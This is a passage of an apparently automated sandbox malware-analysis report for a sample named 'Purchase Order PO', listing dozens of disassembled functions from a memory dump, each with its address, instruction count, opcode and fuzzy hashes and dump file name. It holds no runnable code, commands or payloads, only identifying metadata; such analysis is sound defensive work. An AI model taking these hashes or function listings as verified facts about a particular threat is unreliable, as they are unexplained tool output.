                                                              • Opcode ID: bbd0c5d559b75e07fe76093f602fce329ebce285634b269dd2ab69282173ba92
                                                              • Instruction ID: 56281554c4d73bfc71aaa9b90bed2be313abed9d4d1c2b85c4e20050f092f31f
                                                              • Opcode Fuzzy Hash: bbd0c5d559b75e07fe76093f602fce329ebce285634b269dd2ab69282173ba92
                                                              • Instruction Fuzzy Hash: 8B014C332146019BC320DF69CC89EABBBE8EF84760F50412DF99887180E7399901CBD1
                                                              Function 0100C460 Relevance: .0, Instructions: 48COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a8f6e2f47d935ab2dfdd6a666baf07ac78de3c1ae0f68a9ef9969f7b4cd56b04
                                                              • Instruction ID: 849b429efb47ef22de047a50109212c7beae640eaa4ce8a8b2caae13537f79ac
                                                              • Opcode Fuzzy Hash: a8f6e2f47d935ab2dfdd6a666baf07ac78de3c1ae0f68a9ef9969f7b4cd56b04
                                                              • Instruction Fuzzy Hash: 46115B71A0120DABEB16EF68C955EAE7BB5FB48340F004199BD4197390DB39EE11DB90
                                                              Function 0100C97C Relevance: .0, Instructions: 48COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5549ee11faca4812e9dc5b0356a6bfd28b112b882eaad03a1508a5255641c04f
                                                              • Instruction ID: dc38e99309b503893ed2cc2be6116c6ca3518c9a48af635d987d2ed9cfe06174
                                                              • Opcode Fuzzy Hash: 5549ee11faca4812e9dc5b0356a6bfd28b112b882eaad03a1508a5255641c04f
                                                              • Instruction Fuzzy Hash: 3C118BB16083089FD700DF69C942A9BBBF4EF88310F00855EF998D7391E634E900CB92
                                                              Function 0100CA11 Relevance: .0, Instructions: 48COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c024ebc4ecc5c84d1b2f01314bf9e7d55ca1cc89c8642c8315059076a3d230f2
                                                              • Instruction ID: 0b7501c825bf5b39326949344eaf1cf8c69bca1cb2e9fadfc8b6e602c85f2708
                                                              • Opcode Fuzzy Hash: c024ebc4ecc5c84d1b2f01314bf9e7d55ca1cc89c8642c8315059076a3d230f2
                                                              • Instruction Fuzzy Hash: 69118EB16083089FD700DF69C942A4BBBF4EF89350F00865EF998D73A1E634E900CB92
                                                              Function 01054A80 Relevance: .0, Instructions: 48COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                                              • Instruction ID: b45899fcc80a7bd08006077f4c14790d2dbc3683a9b7f9b45b8c0afe08a5ae30
                                                              • Opcode Fuzzy Hash: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                                              • Instruction Fuzzy Hash: 9501D836200605AFD7A19A6DD845FD7B7E6FBC5210F044459EA82CB650EA74F880C794
                                                              Function 00F9E016 Relevance: .0, Instructions: 46COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                              • Instruction ID: 615a34932fe0c1089d796640a1f6db958764ed601309ffe55ae3f60b557554f7
                                                              • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                              • Instruction Fuzzy Hash: B7017C32604584DFE726C75DC948F3677DDEB957A0F0D04A2F805CB6A1E6A8DC40E661
                                                              Function 00F7826B Relevance: .0, Instructions: 46COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ab07bbec9477c898fc818a9e0b186eee877ea0d3ca1d380b9b39c4805476b0e9
                                                              • Instruction ID: 363a60db4fda5e7152f690420c24cc8e005613137f357132f316cc3d5a3d0c5b
                                                              • Opcode Fuzzy Hash: ab07bbec9477c898fc818a9e0b186eee877ea0d3ca1d380b9b39c4805476b0e9
                                                              • Instruction Fuzzy Hash: 3A01F732B00504DBD714DB65DC05AAE77B9FF80360F19C02AA905AB286EE30DD02E292
                                                              Function 0102EB50 Relevance: .0, Instructions: 46COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: acdee457bb0e162b9b6da843f20afa3c844b662bb36c62e02b0d26545f29bccf
                                                              • Instruction ID: db7cacc3102263f919bf81d95266c4bb596eb7179ffe399a0942f9f982f77534
                                                              • Opcode Fuzzy Hash: acdee457bb0e162b9b6da843f20afa3c844b662bb36c62e02b0d26545f29bccf
                                                              • Instruction Fuzzy Hash: A701F271680710AFE3325B19DC02F07BAA8EF44B50F11442EF2869F391C6B59840DB58
                                                              Function 00F82582 Relevance: .0, Instructions: 45COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3c1b03c33a06838142c02d98b4b5ddc168fd9cd1a0be5e23953f89f67825b805
                                                              • Instruction ID: 078035d7279edb761335c428453611dfad1dd74cbb8f3b606a3836e335a899bf
                                                              • Opcode Fuzzy Hash: 3c1b03c33a06838142c02d98b4b5ddc168fd9cd1a0be5e23953f89f67825b805
                                                              • Instruction Fuzzy Hash: B8F0F433A41A20B7D731AB568C40F47BAAEEB84FA0F144029B5059B640CA34EE01EBA0
                                                              Function 00FAC073 Relevance: .0, Instructions: 43COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                              • Instruction ID: c9c5beee557d410e5f8a743e7f4f38b621447be75e13c8d0f274fe4aec7ccb27
                                                              • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                              • Instruction Fuzzy Hash: 53F0C2F2A00A11ABD324CF4DDC41E57F7EADFC1B90F048128A545C7220EA31DD04CB90
                                                              Function 00F7C310 Relevance: .0, Instructions: 43COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                              • Instruction ID: 88e7d1eb937efc93043c67d8fba4c87757927fa49a81487f1cc75a130cb7e00c
                                                              • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                              • Instruction Fuzzy Hash: 07F0FC33604A329BD77216A95C40B7BB5958FC1B64F19C03FF50DDB244C9648C01B6D3
                                                              Function 00FBCA6F Relevance: .0, Instructions: 42COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                              • Instruction ID: fc9d4949f7a44d1d9e49c15b2eeaab8cf619e7f0fc70cc457240be86251fd58e
                                                              • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                              • Instruction Fuzzy Hash: E601F93260068D9BD722D719C819FAABB9CEF417A0F084061FA44CF6A1DA7DCD01E691
                                                              Function 010561E5 Relevance: .0, Instructions: 41COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: aa56be6bb4e77e3ea821895a8e06c1965ea3571a8763f53ce71f5eb48a287349
                                                              • Instruction ID: 57387f38c887ac09dbec8f6639c861a0351dd3507f266583b287ad98d65f8342
                                                              • Opcode Fuzzy Hash: aa56be6bb4e77e3ea821895a8e06c1965ea3571a8763f53ce71f5eb48a287349
                                                              • Instruction Fuzzy Hash: 6B018F71A006499BDB00DFA9D952EEEBBF8AF48350F14405AF900AB380D738EA01CB94
                                                              Function 010063C0 Relevance: .0, Instructions: 41COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                              • Instruction ID: fec52aff9d99b73de9af4dbf7d4c1547b80891907871da2fcae5f9e57f250220
                                                              • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                              • Instruction Fuzzy Hash: 9DF0127210001DBFEF029F94DD81DAF7B7EEB59398B114125FA1196160D636DD21A7A0
                                                              Function 0100A4B0 Relevance: .0, Instructions: 40COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 867064041e4ac6795a422dd9db8abae4c88833bfa52052fdb840a6591efddd24
                                                              • Instruction ID: 9c40609539097d4eb470be281759f4f4dd76e19703906f1c053e057061f869b3
                                                              • Opcode Fuzzy Hash: 867064041e4ac6795a422dd9db8abae4c88833bfa52052fdb840a6591efddd24
                                                              • Instruction Fuzzy Hash: CD018536600249EBDF129E84DC40EDE3FA6FB4C665F068111FE5866260C736D970EB81
                                                              Function 00F7C0F0 Relevance: .0, Instructions: 39COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ce80a078ecd8456a712f07db641eaf64295cb5e8ce9e02594bac3487ef1d160d
                                                              • Instruction ID: 2116e5dc9e134b1e04981516ae7f1387985712dca5386422cf4078f41fd60f11
                                                              • Opcode Fuzzy Hash: ce80a078ecd8456a712f07db641eaf64295cb5e8ce9e02594bac3487ef1d160d
                                                              • Instruction Fuzzy Hash: B9F0F6727043005BE310A515AC01B223396D7C0761FA9C03FEB098B283F9B4DC01E3D6
                                                              Function 00FB656A Relevance: .0, Instructions: 39COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2ebdbf866e031a8c8e34124b8f80edf20a98ad8b86d741f31d5a3b98790c6a52
                                                              • Instruction ID: 25d5692ce76e3ea15eccd7f51141e1cf74e32f676e8a82623fa70d636ca56084
                                                              • Opcode Fuzzy Hash: 2ebdbf866e031a8c8e34124b8f80edf20a98ad8b86d741f31d5a3b98790c6a52
                                                              • Instruction Fuzzy Hash: 9201A471A006859BE7329729CD49FB633A4AF40B54F580190BA41DB6E6E72CEC11B610
                                                              Function 0102437C Relevance: .0, Instructions: 37COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                              • Instruction ID: 9dc7dddc7cef0e35f52007a0b0ca85c5525a6f5ea1d235b89491ad104e20c146
                                                              • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                              • Instruction Fuzzy Hash: 12F02E31341D3347EBB6AA2EC860B6EB6D5AFC0E00B05856DE6C2DB640DF60DC00C780
                                                              Function 0100E872 Relevance: .0, Instructions: 36COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                              • Instruction ID: 4b7d5341455927b3bcc9de533f5bdea19a919e32ce23854b9e00f749ffe6a505
                                                              • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                              • Instruction Fuzzy Hash: 02F054327155119BF7629A4DDC80F16B7E8AFC5A60F590475A64CBB2A0C760ED0187D0
                                                              Function 0100C89D Relevance: .0, Instructions: 36COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 740ddf11c68239de865b70a56b8efe960cea9ea1c28a00eeb624bfe172933a05
                                                              • Instruction ID: 811f4bf768f10f61a17a339c6677913cbc8959b9d23289e8cc8149f98012bf61
                                                              • Opcode Fuzzy Hash: 740ddf11c68239de865b70a56b8efe960cea9ea1c28a00eeb624bfe172933a05
                                                              • Instruction Fuzzy Hash: 16F0AF716057049FD310EF28C942E1AB7E4EF88710F40865EB898DB3D1EA38EA00C796
                                                              Function 00FB0854 Relevance: .0, Instructions: 35COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                              • Instruction ID: 243705e1ba99d22e62be43e782595738d2990e86480d4257ca7257e913ae7210
                                                              • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                              • Instruction Fuzzy Hash: 4EF0B472610204AFE715DF22CC01F97B2E9EF98350F1480789545D71A0FAB5DE01EA54
                                                              Function 01008D20 Relevance: .0, Instructions: 35COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fa068d627f6e47d4cf3f7affecd999e847263572255ac1529ffa766755485b31
                                                              • Instruction ID: f0e9db08d97c626218eb30786cdf8064fbc06219df6545cb71d8df69a69c6906
                                                              • Opcode Fuzzy Hash: fa068d627f6e47d4cf3f7affecd999e847263572255ac1529ffa766755485b31
                                                              • Instruction Fuzzy Hash: 14F0B432D00284ABE6227A1CEC44BDABBA9FB95720F494657F9C537291C7396C81C780
                                                              Function 0100C912 Relevance: .0, Instructions: 34COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b8a9466299aeaf4fd221f4aca2cb4407285bef729fdc79a013f2815b7f7de8d5
                                                              • Instruction ID: 0d76eb33d33add5e3b22251cd309de218cf266c06b79993b721423beac836327
                                                              • Opcode Fuzzy Hash: b8a9466299aeaf4fd221f4aca2cb4407285bef729fdc79a013f2815b7f7de8d5
                                                              • Instruction Fuzzy Hash: 49F04F70A016499FDB04EF69CA56E9EB7B4EF48300F00815AB955EB395DA38EA01CB90
                                                              Function 00F847FB Relevance: .0, Instructions: 33COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9261bacbb1bed9cebc6d590faabf7200fc6d82c988e5756e83964cc2c18f615d
                                                              • Instruction ID: a9e2c11ecd17092284536c2dd04df4a32afda491e4b6b71bf00a75ab015c215f
                                                              • Opcode Fuzzy Hash: 9261bacbb1bed9cebc6d590faabf7200fc6d82c988e5756e83964cc2c18f615d
                                                              • Instruction Fuzzy Hash: 44F02E32C022E39FD732EB28C404BE2B7C8AB00738F0D896AD89983502C324FC80E700
                                                              Function 01040115 Relevance: .0, Instructions: 32COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c550a0264ca7e548a07c4917bc02a00f00980f77fdd1818cff7e90154397656b
                                                              • Instruction ID: 873b9c0fcde4ed4cfd0a6f1bed515a04d3d48bd36314a55f6f93994fb1401467
                                                              • Opcode Fuzzy Hash: c550a0264ca7e548a07c4917bc02a00f00980f77fdd1818cff7e90154397656b
                                                              • Instruction Fuzzy Hash: E2F027B6815A854BEF726B3CA4E42D16B98A781110F0914D9D5E377219C57B8483C324
                                                              Function 00FBC5ED Relevance: .0, Instructions: 31COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 45802c5792475b8cf62534858373aa83fef2f079058dc399fd298be88e46e2b8
                                                              • Instruction ID: fdf232a54191a1f6c0d8f1f11605ef3735d3eeb021a6d153d209821ae8c3269f
                                                              • Opcode Fuzzy Hash: 45802c5792475b8cf62534858373aa83fef2f079058dc399fd298be88e46e2b8
                                                              • Instruction Fuzzy Hash: 40F0E272A116519FD722971AC148FD373DAAF80BB1F18A565D80EC7512C364DC80EED0
                                                              Function 00FC2619 Relevance: .0, Instructions: 31COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                              • Instruction ID: 931186700615625d82e44f0e26ac4a1925a30847db6fd9b67c1d8f3d053ea497
                                                              • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                              • Instruction Fuzzy Hash: 68E0D832340A016BE712AE59CDC6F47776EEFC2B10F04007DB5045F252C9E6DD0996B4
                                                              Function 01016030 Relevance: .0, Instructions: 29COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                              • Instruction ID: 742baeeb0fac3c657ab595a99d7b034b120696377b6b084c9c77dc6a8e2ed5b7
                                                              • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                              • Instruction Fuzzy Hash: E3F08C721006049FE3228F09DC40B53B7F8EB05364F028065F6488B161D3BEEC40CBA0
                                                              Function 00F80710 Relevance: .0, Instructions: 28COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                              • Instruction ID: c07dd4fa8d1c743910e7be1f3bdc430bca7af67a370e5016abff2697a66366d4
                                                              • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                              • Instruction Fuzzy Hash: 36F0ED3A2047449BEB15EF15D050AE97BA9EB91360B950096E8468F341EB31FD82EB80
                                                              Function 00FB49D0 Relevance: .0, Instructions: 28COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                              • Instruction ID: 4b3bf86d711465c2a0dae91a1fc49794ebbd93098a5e91b1af30468280b469bf
                                                              • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                              • Instruction Fuzzy Hash: 11E09233684546ABD7212E568901BA676AD9BD07A0F150429E1008B252DB78EC40FB9C
                                                              Function 0102678E Relevance: .0, Instructions: 27COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                              • Instruction ID: 23a4afd8b42c00eaed96d020d0209bffc11344e1c247b9a1303007839b6b8e23
                                                              • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                              • Instruction Fuzzy Hash: 99E0D832600120BBDF2197598D01F9A7EACEB44F90F050065FA00D7090D531DE00D690
                                                              Function 00F825E0 Relevance: .0, Instructions: 23COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 3a8aae1ddaf44b632bf329d8ed5dea889b1adbb3dce61bf0648494bc0e23d32a
                                                              • Instruction ID: fe05a6507bf9101cbb92936b83677baca23586bc2c8bba093768868fa78af643
                                                              • Opcode Fuzzy Hash: 3a8aae1ddaf44b632bf329d8ed5dea889b1adbb3dce61bf0648494bc0e23d32a
                                                              • Instruction Fuzzy Hash: 7EE092721009949BC721BB29DD02F8B7B9AEB94360F014519F15557191CB39BD10D784
                                                              Function 0103A456 Relevance: .0, Instructions: 23COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
